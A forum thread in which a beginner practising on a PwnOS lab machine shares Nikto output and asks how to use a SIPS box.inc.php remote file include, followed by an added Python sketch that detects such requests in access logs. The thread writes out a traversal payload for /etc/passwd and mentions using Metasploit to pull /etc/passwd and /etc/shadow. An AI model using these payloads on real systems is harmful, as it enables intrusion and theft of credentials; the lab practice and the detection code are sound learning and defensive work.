Thread: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability - how to exploit?

  1. #1

    SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability - how to exploit?

    Hello,

    I'm rather new to the pen test scene. I'm just playing around with PwnOS and Backtrack 4 right now. I did a Nikto scan and got this information:

    Code:
    root@bt:/pentest/scanners/nikto# perl nikto.pl -h 192.168.3.4 -p 10000
    - Nikto v2.1.0
    ---------------------------------------------------------------------------
    + Target IP:          192.168.3.4
    + Target Hostname:    192.168.3.4
    + Target Port:        10000
    + Start Time:         2010-04-26 15:16:44
    ---------------------------------------------------------------------------
    + Server: MiniServ/0.01
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + OSVDB-0: DEBUG HTTP verb may show server debugging information
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-0: MiniServ - This is the Webmin Unix administrator. It should not be running unless required.
    + OSVDB-0: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
    + OSVDB-0: /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
    + OSVDB-0: /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
    + OSVDB-0: /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
    + OSVDB-6659: /icH6vqwwEtEVJ2XIyFC3AYHAu8dY0Y6YbrqhSXwsa4DE8ZXayf68tlelLTHZkYzb5hJhoeWmEuFjOTTP8fdDHrIHJ2NXk0a16oa9KHvEGYXqFMJ94eeQGxGbLnq2UfvAzeIh2XCRAoHnUza4Lw5MPMvs3EtLRdMIJcK4tmgcXFUtkgMmi2fMIEqFgPBQ0a4UsANg39e0crlYIoOCPVCQwbfyeOd8ZRv<font%20size=50>DEFACED<!--//--: MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.
    + 3588 items checked: 8 item(s) reported on remote host
    + End Time:           2010-04-26 15:21:16 (272 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

    Anyway, I thought this would be a good thing to exploit (SIPS v0.2.2 allows user account info (including password) to be retrieved remotely). Trouble is that I don't really understand how to execute the exploit. I've looked at some RFI tutorials but I've had no success on the target machine.

    I found this in an exploit db:

    Code:
    http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]
    SIPS <= 0.3.1 (box.inc.php) Remote File Include Vulnerability

    So for me that URL should transform into: I've found out that I should be able to replace [SHELL] with the remote command I want to execute on the server. Like ../../../../../../../../etc/passwd%00 in order to view the password file.

    Code:
    http://192.168.3.4:10000/sipssys/cod...inc.php?config[sipssys]=../../../../../../../../etc/passwd%00

    So, that's where I am now. Later on when I get this to work I'll try and make it execute a script, on my attack machine, granting me shell access on the server.

    My question regards this part: config[sipssys]... What should I replace [sipssys] with? I guess that's the thing I'm missing here.

  2. #2

    Re: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability - how to exploit?

    I just fired up Metasploit and ran a search for webmin. I used the auxiliary there in order to retrieve the /etc/passwd & /etc/shadow files. So simple. Consider this one solved.
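
On the defending side, requests shaped like the one in the first post are easy to spot in a web server access log. The sketch below is an added example, not part of the thread or of SIPS: it flags any request to box.inc.php that sets config[sipssys], and labels traversal sequences, null bytes and remote URLs in the value. The combined log format, the /sips path prefix, the sample lines and the reason labels are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed combined-format access-log lines (not taken from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Apr/2010:15:20:01 +0200] "GET /sips/index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [26/Apr/2010:15:20:07 +0200] "GET /sips/sipssys/code/box.inc.php'
    '?config[sipssys]=../../../../etc/passwd%00 HTTP/1.1" 200 911',
    '192.0.2.11 - - [26/Apr/2010:15:21:40 +0200] "GET /sips/sipssys/code/box.inc.php'
    '?config%5Bsipssys%5D=http://example.invalid/x.txt HTTP/1.0" 200 0',
    '192.0.2.12 - - [26/Apr/2010:15:22:02 +0200] "GET /sips/sipssys/code/box.inc.php'
    '?config[sipssys]=lib HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

def classify_value(value):
    """Name the reasons a client-supplied include path looks hostile."""
    reasons = []
    if TRAVERSAL_RE.search(value):
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    if SCHEME_RE.match(value):
        reasons.append("remote-url")
    return reasons

def scan(lines, script="box.inc.php", param="config[sipssys]"):
    """Return (line_number, reasons) for requests that set the include variable."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qsl percent-decodes keys and values, so config%5Bsipssys%5D
        # and %00 are compared in decoded form.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param:
                # An include file has no reason to receive this from a client.
                hits.append((number, classify_value(value) or ["client-set"]))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```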
